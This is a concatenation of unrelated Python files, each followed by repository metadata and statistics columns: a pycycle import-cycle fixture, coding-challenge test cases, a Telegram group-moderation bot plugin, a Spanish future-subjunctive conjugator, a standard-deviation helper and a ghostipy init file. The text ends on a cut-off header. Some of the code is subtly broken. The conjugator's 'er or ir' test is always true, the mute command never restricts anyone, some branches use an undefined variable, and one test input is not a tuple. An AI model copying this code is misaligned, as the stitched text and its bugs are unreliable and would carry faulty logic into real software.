tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 319
|
2017-01-28T19:29:16.000Z
|
2022-03-18T08:45:42.000Z
|
tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 18
|
2017-01-31T14:12:38.000Z
|
2022-03-08T12:15:10.000Z
|
tests/_projects/a_references_b_b_references_a/a_module.py
|
marek-trmac/pycycle
|
f477e70b7a6875eada05475c27bc20d19587d585
|
[
"MIT"
] | 31
|
2017-01-29T19:52:15.000Z
|
2022-03-09T13:32:33.000Z
|
from b_module import some_func
from some_package.c_module import some_third_func
def some_other_func():
    # Delegates to b_module.some_func (imported above); return value is
    # discarded. Presumably exists only to force the a->b import edge in
    # pycycle's circular-import test fixture — TODO confirm.
    some_func()
| 24
| 49
| 0.825
| 21
| 120
| 4.285714
| 0.52381
| 0.266667
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 5
| 50
| 24
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cbc2b551e67bbef190c14f4c47e5556bffe28a3c
| 9,261
|
py
|
Python
|
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | 1
|
2019-10-19T14:10:58.000Z
|
2019-10-19T14:10:58.000Z
|
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | null | null | null |
source/solution.py
|
guglielmogattiglio/py_submit_plat
|
08aae2e3622f297a6553455dee5eba50cc8d3b66
|
[
"BSD-2-Clause"
] | null | null | null |
'''
Instructions: each number corresponds to a challenge id. The corresponding list
contains one entry per test case. Each test case consists of the inputs — note
that they are enclosed within a tuple — followed by the expected output.
'''
my_solutions = {1: [
[([0,0,0,0],),0.0],
[([1,0,1,0],),1.4142135623730951],
[([1,10,6,4],),9.219544457292887],
[([4,8,5,9],), 5.656854249492381],
[([7,7,6,6],),0.0]
],
2: [
[('Land',),'La La Land'],
[('Milan Merda',),'Mi Mi Milan Merda'],
[('Fozza Inda',), 'Fo Fo Fozza Inda'],
[('Moonlight'), 'Moo Moo Moonlight'],
[('Ciao Ettori',), 'Ciao Ciao Ciao Ettori']
],
3: [
[(5,), '--------e--------\n------e-d-e------\n----e-d-c-d-e----\n--e-d-c-b-c-d-e--\ne-d-c-b-a-b-c-d-e\n--e-d-c-b-c-d-e--\n----e-d-c-d-e----\n------e-d-e------\n--------e--------'], #first test case
[(12,), '----------------------l----------------------\n--------------------l-k-l--------------------\n------------------l-k-j-k-l------------------\n----------------l-k-j-i-j-k-l----------------\n--------------l-k-j-i-h-i-j-k-l--------------\n------------l-k-j-i-h-g-h-i-j-k-l------------\n----------l-k-j-i-h-g-f-g-h-i-j-k-l----------\n--------l-k-j-i-h-g-f-e-f-g-h-i-j-k-l--------\n------l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l------\n----l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l----\n--l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l--\nl-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l\n--l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l--\n----l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l----\n------l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l------\n--------l-k-j-i-h-g-f-e-f-g-h-i-j-k-l--------\n----------l-k-j-i-h-g-f-g-h-i-j-k-l----------\n------------l-k-j-i-h-g-h-i-j-k-l------------\n--------------l-k-j-i-h-i-j-k-l--------------\n----------------l-k-j-i-j-k-l----------------\n------------------l-k-j-k-l------------------\n--------------------l-k-l--------------------\n----------------------l----------------------'], #second test case
[(2,), '--b--\nb-a-b\n--b--'],
[(15,), '----------------------------o----------------------------\n--------------------------o-n-o--------------------------\n------------------------o-n-m-n-o------------------------\n----------------------o-n-m-l-m-n-o----------------------\n--------------------o-n-m-l-k-l-m-n-o--------------------\n------------------o-n-m-l-k-j-k-l-m-n-o------------------\n----------------o-n-m-l-k-j-i-j-k-l-m-n-o----------------\n--------------o-n-m-l-k-j-i-h-i-j-k-l-m-n-o--------------\n------------o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o------------\n----------o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o----------\n--------o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o--------\n------o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o------\n----o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o----\n--o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o--\no-n-m-l-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l-m-n-o\n--o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o--\n----o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o----\n------o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o------\n--------o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o--------\n----------o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o----------\n------------o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o------------\n--------------o-n-m-l-k-j-i-h-i-j-k-l-m-n-o--------------\n----------------o-n-m-l-k-j-i-j-k-l-m-n-o----------------\n------------------o-n-m-l-k-j-k-l-m-n-o------------------\n--------------------o-n-m-l-k-l-m-n-o--------------------\n----------------------o-n-m-l-m-n-o----------------------\n------------------------o-n-m-n-o------------------------\n--------------------------o-n-o--------------------------\n----------------------------o----------------------------'],
[(20,), '--------------------------------------t--------------------------------------\n------------------------------------t-s-t------------------------------------\n----------------------------------t-s-r-s-t----------------------------------\n--------------------------------t-s-r-q-r-s-t--------------------------------\n------------------------------t-s-r-q-p-q-r-s-t------------------------------\n----------------------------t-s-r-q-p-o-p-q-r-s-t----------------------------\n--------------------------t-s-r-q-p-o-n-o-p-q-r-s-t--------------------------\n------------------------t-s-r-q-p-o-n-m-n-o-p-q-r-s-t------------------------\n----------------------t-s-r-q-p-o-n-m-l-m-n-o-p-q-r-s-t----------------------\n--------------------t-s-r-q-p-o-n-m-l-k-l-m-n-o-p-q-r-s-t--------------------\n------------------t-s-r-q-p-o-n-m-l-k-j-k-l-m-n-o-p-q-r-s-t------------------\n----------------t-s-r-q-p-o-n-m-l-k-j-i-j-k-l-m-n-o-p-q-r-s-t----------------\n--------------t-s-r-q-p-o-n-m-l-k-j-i-h-i-j-k-l-m-n-o-p-q-r-s-t--------------\n------------t-s-r-q-p-o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o-p-q-r-s-t------------\n----------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----------\n--------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--------\n------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t------\n----t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----\n--t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--\nt-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t\n--t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--\n----t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----\n------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t------\n--------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--------\n----------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----------\n------------t-s-
r-q-p-o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o-p-q-r-s-t------------\n--------------t-s-r-q-p-o-n-m-l-k-j-i-h-i-j-k-l-m-n-o-p-q-r-s-t--------------\n----------------t-s-r-q-p-o-n-m-l-k-j-i-j-k-l-m-n-o-p-q-r-s-t----------------\n------------------t-s-r-q-p-o-n-m-l-k-j-k-l-m-n-o-p-q-r-s-t------------------\n--------------------t-s-r-q-p-o-n-m-l-k-l-m-n-o-p-q-r-s-t--------------------\n----------------------t-s-r-q-p-o-n-m-l-m-n-o-p-q-r-s-t----------------------\n------------------------t-s-r-q-p-o-n-m-n-o-p-q-r-s-t------------------------\n--------------------------t-s-r-q-p-o-n-o-p-q-r-s-t--------------------------\n----------------------------t-s-r-q-p-o-p-q-r-s-t----------------------------\n------------------------------t-s-r-q-p-q-r-s-t------------------------------\n--------------------------------t-s-r-q-r-s-t--------------------------------\n----------------------------------t-s-r-s-t----------------------------------\n------------------------------------t-s-t------------------------------------\n--------------------------------------t--------------------------------------']
],
4: [
[tuple(),1918080160]
],
5: [
[tuple(),38182]
],
6: [
[ ([[]],0,[0 for i in range(10)]), [[]] ],
[ ([[1]],0,[0 for i in range(10)]), [[1]] ],
[ ([[1]],5,[0 for i in range(10)]), [[1]] ],
[ ([[1]],5,[1 for i in range(10)]), [[6]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],4,[-1,3,0,1,3,-2,0,0,0,0]), [[1, 4, 6, 6, 7, 6, 6, 4, 5, 3]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],8,[-1,3,0,1,3,-2,0,0,0,0]), [[1, 8, 10, 10, 11, 10, 10, 8, 9, 3]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],3,[-2,-1,0,1,3,-2,0,0,-4,0]), [[1, 1, 0, 0, 0, 0, 0, 1, 2, 0]] ],
[ ([[1,1],[1,1],[0,0],[0,1],[1,0],[0,9],[0,500],[1,2],[2,432],[0,2]],5,[-2,-1,0,1,3,-2,-10,-10,-4,-10]), [[7, 7],[0, 0],[0, 0],[0, 0],[0, 0],[0, 0],[12, 512],[0, 0],[0, 412],[9, 11]] ],
[ ([[0,1,3,0],[1,0,0,0]],3,[-1,-1,0,1,3,0,0,0,0,0]), [[4, 5, 7, 0], [5, 4, 4, 0]] ],
[ ([[0,1,3,0],[1,0,0,0]],7,[-1,-1,0,1,3,0,0,0,0,0]), [[16, 5, 19, 0], [17, 4, 16, 0]] ],
[ ([[0,1,3,0],[1,0,0,0]],7,[2,-1,0,1,3,0,0,-1,0,2]), [[16, 5, 19, 0], [17, 4, 16, 0]] ],
[ ([[0,0,1,0,2,3],[0,1,0,0,1,0],[0,0,1,2,0,1],[0,4,2,0,2,3]],1,[-1,3,0,1,3,-2,0,0,0,0]), [[3, 0, 1, 1, 3, 4],[3, 2, 3, 0, 0, 3],[0, 3, 0, 0, 0, 4],[3, 5, 5, 3, 5, 4]] ],
[ ([[0,0,1,0,2,3],[0,1,0,0,1,0],[0,0,1,2,0,1],[0,4,2,0,2,3]],5,[-1,3,0,1,3,-2,0,0,0,0]), [[7, 3, 1, 1, 5, 8],[15, 0, 0, 6, 0, 15],[0, 3, 0, 3, 0, 16],[7, 17, 2, 13, 2, 8]] ],
[ ([[0,3,11,8,6,7,0,3,9,7],
[0,0,13,4,6,3,3,1,4,9],
[6,10,4,0,0,4,3,5,0,10],
[0,5,0,0,1,1,1,4,0,2],
[3,0,3,7,5,5,8,3,2,7],
[4,0,7,0,0,11,3,2,0,3],
[1,0,3,1,3,3,9,9,9,2],
[3,8,0,5,0,0,0,7,4,6],
[0,0,0,0,5,3,5,0,8,3],
[1,0,7,6,11,8,5,0,2,9]], 5, [-3,0,-2,1,-1,0,-1,3,-2,2,-3]),
[[0,0,8,3,1,6,0,2,4,2],
[0,12,13,19,21,14,0,1,10,5],
[3,6,1,0,0,0,7,8,0,8],
[0,0,0,0,0,0,1,11,0,0],
[8,0,2,3,0,11,12,11,2,6],
[3,0,4,7,7,13,5,9,9,0],
[0,0,0,9,11,0,16,10,12,0],
[6,3,1,4,0,0,0,13,4,4],
[3,0,0,0,2,0,4,6,20,0],
[0,0,0,1,9,5,1,1,0,7]] ]
]
}
| 134.217391
| 3,110
| 0.292085
| 2,293
| 9,261
| 1.179241
| 0.044919
| 0.076183
| 0.06324
| 0.075444
| 0.717456
| 0.693417
| 0.684541
| 0.667899
| 0.656805
| 0.632027
| 0
| 0.088476
| 0.1042
| 9,261
| 68
| 3,111
| 136.191176
| 0.237464
| 0.027643
| 0
| 0.079365
| 0
| 0.063492
| 0.687083
| 0.670965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1db150f4ceb3460b018f4a6e6f49091eda8ad8dd
| 17,393
|
py
|
Python
|
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
import config
from amanobot.namedtuple import InlineKeyboardMarkup
from amanobot.exception import TelegramError, NotEnoughRightsError
# Shared bot handle and ids pulled from the project-wide config module.
bot = config.bot
bot_id = config.bot_id
# sudoers: user ids always treated as admins by isAdmin() below.
sudos = config.sudoers
def isAdmin(chat_id, user_id, reply_id=None):
    """Return admin-status flags for a chat.

    Args:
        chat_id: Telegram chat to inspect.
        user_id: id of the acting user.
        reply_id: id of the replied-to user, or None.

    Returns:
        dict with boolean keys:
        'user'  - acting user is a chat admin or a sudoer,
        'reply' - replied-to user is a chat admin,
        'bot'   - this bot itself is a chat admin.
    """
    adms = bot.getChatAdministrators(chat_id)
    adm_id = [ids['user']['id'] for ids in adms]
    # Direct boolean expressions replace the original if/else ladders.
    return {
        'user': user_id in adm_id or user_id in sudos,
        'reply': reply_id in adm_id,
        'bot': bot_id in adm_id,
    }
def _mod_command(msg, usage, action, success):
    """Shared workflow for the /ban, /kick, /mute, /unmute and /unban commands.

    Args:
        msg: Telegram message dict.
        usage: error text sent when an explicit user id cannot be resolved.
        action: callable(chat_id, target_id) performing the moderation call.
        success: callable(admin_first_name, target_first_name) -> reply text.
    """
    if msg['chat']['type'] == 'private':
        bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
        return
    # Resolve the target: replied-to message first, then an explicit id argument.
    reply_name = None
    if msg.get('reply_to_message'):
        reply_id = msg['reply_to_message']['from']['id']
        reply_name = msg['reply_to_message']['from']['first_name']
    elif len(msg['text'].split()) > 1:
        u_id = msg['text'].split()[1]
        try:
            get = bot.getChat(u_id)
            reply_id = get['id']
            reply_name = get['first_name']
        except Exception:
            bot.sendMessage(msg['chat']['id'], usage,
                            reply_to_message_id=msg['message_id'])
            return
    else:
        reply_id = None
    adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
    if not adm['user']:
        # Non-admins are silently ignored (original behavior).
        return
    try:
        int(reply_id)
    except Exception:
        # reply_id is None (no reply, no argument): ask for a target.
        return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
                               reply_to_message_id=msg['message_id'])
    if not adm['bot']:
        bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
                        reply_to_message_id=msg['message_id'])
        return
    if adm['reply']:
        # Never act against another admin.
        bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
                        reply_to_message_id=msg['message_id'])
        return
    action(msg['chat']['id'], reply_id)
    bot.sendMessage(msg['chat']['id'], success(msg['from']['first_name'], reply_name),
                    reply_to_message_id=msg['message_id'])


def admins(msg):
    """Dispatch admin text commands (ban/kick/mute/unmute/unban/pin/unpin/
    title/config) and the /config callback-query menu.

    Returns True only from the /config branch (original behavior); otherwise
    returns None.
    """
    if msg.get('text'):
        cmd = msg['text'].split()[0]
        if cmd in ('/ban', '!ban'):
            _mod_command(
                msg,
                'ID inválida ou desconhecida. use nesse formato: /ban ID do usuário',
                bot.kickChatMember,
                lambda adm, target: '{} baniu {}!'.format(adm, target))
        elif cmd in ('/kick', '!kick'):
            # "Kick" is implemented via unbanChatMember (original behavior).
            _mod_command(
                msg,
                'ID inválida ou desconhecida. use nesse formato: /kick ID do usuário',
                bot.unbanChatMember,
                lambda adm, target: '{} kickou {}!'.format(adm, target))
        elif cmd in ('/mute', '!mute'):
            # NOTE(review): the original calls unbanChatMember here, which does
            # not restrict the user at all; kept as-is to preserve behavior —
            # confirm whether restrictChatMember(..., can_send_messages=False)
            # was intended.
            _mod_command(
                msg,
                'ID inválida ou desconhecida. use nesse formato: /mute ID do usuário',
                bot.unbanChatMember,
                lambda adm, target: '{} restringiu {}!'.format(adm, target))
        elif cmd in ('/unmute', '!unmute'):
            # BUG FIX: the original passed an undefined name `chat_id` to
            # restrictChatMember (NameError); the chat id now comes from msg.
            _mod_command(
                msg,
                'ID inválida ou desconhecida. use nesse formato: /unban ID do usuário',
                lambda chat, user: bot.restrictChatMember(
                    chat, user,
                    can_send_messages=True,
                    can_send_media_messages=True,
                    can_send_other_messages=True,
                    can_add_web_page_previews=True),
                lambda adm, target: '{} agora pode falar aqui!'.format(target))
        elif cmd in ('/unban', '!unban'):
            _mod_command(
                msg,
                'ID inválida ou desconhecida. use nesse formato: /unban ID do usuário',
                bot.unbanChatMember,
                lambda adm, target: '{} desbaniu {}!'.format(adm, target))
        elif cmd in ('/pin', '!pin'):
            if msg['chat']['type'] == 'private':
                bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
            elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
                if msg.get('reply_to_message'):
                    bot.pinChatMessage(msg['chat']['id'], msg['reply_to_message']['message_id'])
                    bot.sendMessage(msg['chat']['id'], 'Mensagem fixada',
                                    reply_to_message_id=msg['message_id'])
                else:
                    bot.sendMessage(msg['chat']['id'], 'Responda a uma mensagem para eu fixar.',
                                    reply_to_message_id=msg['message_id'])
        elif cmd in ('/unpin', '!unpin'):
            if msg['chat']['type'] == 'private':
                bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
            elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
                bot.unpinChatMessage(msg['chat']['id'])
                bot.sendMessage(msg['chat']['id'], 'Mensagem desfixada',
                                reply_to_message_id=msg['message_id'])
        elif msg['text'].startswith('/title') or msg['text'].startswith('!title'):
            text = msg['text'][7:]
            if msg['chat']['type'] == 'private':
                # BUG FIX: the original referenced an undefined name `chat_id`
                # here (NameError).
                bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
            elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
                if text == '':
                    bot.sendMessage(msg['chat']['id'], 'Uso: /title titulo do grupo',
                                    reply_to_message_id=msg['message_id'])
                else:
                    try:
                        bot.setChatTitle(msg['chat']['id'], text)
                        bot.sendMessage(msg['chat']['id'], 'O novo título do grupo foi definido com sucesso!',
                                        reply_to_message_id=msg['message_id'])
                    except NotEnoughRightsError:
                        bot.sendMessage(msg['chat']['id'], 'Eu nao tenho tenho permissão para alterar as informações do grupo',
                                        reply_to_message_id=msg['message_id'])
                    except Exception:
                        bot.sendMessage(msg['chat']['id'], 'Ocorreu um erro.',
                                        reply_to_message_id=msg['message_id'])
        elif msg['text'] == '/config':
            if isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
                kb = InlineKeyboardMarkup(inline_keyboard=[
                    [dict(text='⚙️ Opções do chat', callback_data='options {}'.format(msg['chat']['id']))],
                    [dict(text='🗑 Deletar mensagem', callback_data='del_msg')]
                ])
                # The menu itself goes to the admin's private chat.
                bot.sendMessage(msg['from']['id'], 'Menu de configuração do chat {}'.format(msg['chat']['title']),
                                reply_markup=kb)
                bot.sendMessage(msg['chat']['id'], 'Enviei um menu de configurações no seu pv.',
                                reply_to_message_id=msg['message_id'])
                return True
    elif msg.get('data'):
        # Callback-query handling for the /config inline menu.
        if msg['data'].startswith('options'):
            target_chat = msg['data'].split()[1]
            bot.answerCallbackQuery(msg['id'], 'Abrindo...')
            if isAdmin(target_chat, msg['from']['id'])['user']:
                info = bot.getChat(target_chat)
                kb = InlineKeyboardMarkup(inline_keyboard=[
                    [dict(text='IA', callback_data='.'.format(target_chat))] +
                    [dict(text='None', callback_data='IA {}'.format(target_chat))],
                    [dict(text='Voltar', callback_data='back {}'.format(target_chat))]
                ])
                bot.editMessageText((msg['from']['id'], msg['message']['message_id']),
                                    'Opções do chat {}'.format(info['title']),
                                    reply_markup=kb)
        elif msg['data'].startswith('back'):
            target_chat = msg['data'].split()[1]
            info = bot.getChat(target_chat)
            kb = InlineKeyboardMarkup(inline_keyboard=[
                [dict(text='⚙️ Opções do chat', callback_data='options {}'.format(target_chat))],
                [dict(text='🗑 Deletar mensagem', callback_data='del_msg')]
            ])
            bot.editMessageText((msg['from']['id'], msg['message']['message_id']),
                                'Menu de configuração do chat {}'.format(info['title']),
                                reply_markup=kb)
        elif msg['data'] == 'del_msg':
            bot.deleteMessage((msg['from']['id'], msg['message']['message_id']))
| 50.856725
| 127
| 0.428046
| 1,729
| 17,393
| 4.145171
| 0.098323
| 0.087903
| 0.071578
| 0.117204
| 0.827961
| 0.784847
| 0.770197
| 0.736431
| 0.721501
| 0.699316
| 0
| 0.003209
| 0.426608
| 17,393
| 341
| 128
| 51.005865
| 0.713226
| 0
| 0
| 0.731788
| 0
| 0
| 0.199908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006623
| false
| 0
| 0.009934
| 0
| 0.056291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1dbe549fb8095d0cef530c59aff7e02f26956f31
| 1,701
|
py
|
Python
|
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-15 -*-
# Future-subjunctive endings per pronoun:
# (ending for -ar verbs, ending for -er/-ir verbs).
_FUTURE_SUBJUNCTIVE_ENDINGS = {
    "yo": ("are", "iere"),
    "tu": ("ares", "ieres"),
    "usted": ("are", "iere"),
    "nosotros": ("áremos", "iéremos"),
    "vosotros": ("areis", "iereis"),
    "ustedes": ("aren", "ieren"),
}


def subjunctive_future(root_verb, pronoun):
    """Conjugate an infinitive into the Spanish future subjunctive.

    Args:
        root_verb: infinitive verb ending in "ar", "er" or "ir".
        pronoun: one of "yo", "tu", "usted", "nosotros", "vosotros", "ustedes".

    Returns:
        The conjugated form, or None for an unknown pronoun or verb ending.
    """
    endings = _FUTURE_SUBJUNCTIVE_ENDINGS.get(pronoun)
    if endings is None:
        return None
    stem = root_verb[:-2]
    if root_verb[-2:] == "ar":
        return stem + endings[0]
    # BUG FIX: the original tested `root_verb[-2:] == "er" or "ir"`, which is
    # always truthy ("ir" is a non-empty string), so ANY non-"ar" ending was
    # conjugated as -er/-ir. A proper membership test is used instead; the
    # table also removes the six near-identical copies of the pronoun ladder.
    if root_verb[-2:] in ("er", "ir"):
        return stem + endings[1]
    return None
| 35.4375
| 52
| 0.495003
| 184
| 1,701
| 4.434783
| 0.184783
| 0.245098
| 0.264706
| 0.161765
| 0.720588
| 0.720588
| 0.720588
| 0.720588
| 0.720588
| 0.558824
| 0
| 0.027223
| 0.352146
| 1,701
| 48
| 53
| 35.4375
| 0.713249
| 0.015873
| 0
| 0.651163
| 0
| 0
| 0.074118
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.302326
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69937d97f07e4064b566f5bb032eae5baae11a2c
| 128
|
py
|
Python
|
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
from sampleStatistics.sampleVariance import sample_variance
def sample_std_deviation(a):
    """Return the sample standard deviation of *a*: the square root of
    its sample variance."""
    variance = sample_variance(a)
    return variance ** 0.5
| 21.333333
| 59
| 0.804688
| 17
| 128
| 5.823529
| 0.764706
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017857
| 0.125
| 128
| 5
| 60
| 25.6
| 0.866071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
69d5f2d420c1bcfe518623b05b2541418c15f14f
| 150
|
py
|
Python
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 9
|
2021-07-28T09:29:55.000Z
|
2022-03-17T16:17:22.000Z
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 5
|
2021-07-20T01:00:38.000Z
|
2022-01-27T00:06:17.000Z
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 1
|
2022-02-04T22:59:52.000Z
|
2022-02-04T22:59:52.000Z
|
from ghostipy.spectral.mtm import *
from ghostipy.spectral.cwt import *
from ghostipy.spectral.wsst import *
from ghostipy.spectral.wavelets import *
| 30
| 40
| 0.813333
| 20
| 150
| 6.1
| 0.4
| 0.393443
| 0.655738
| 0.639344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 41
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
69f59b051def9686d4205db451a108aabab1520b
| 3,109
|
py
|
Python
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
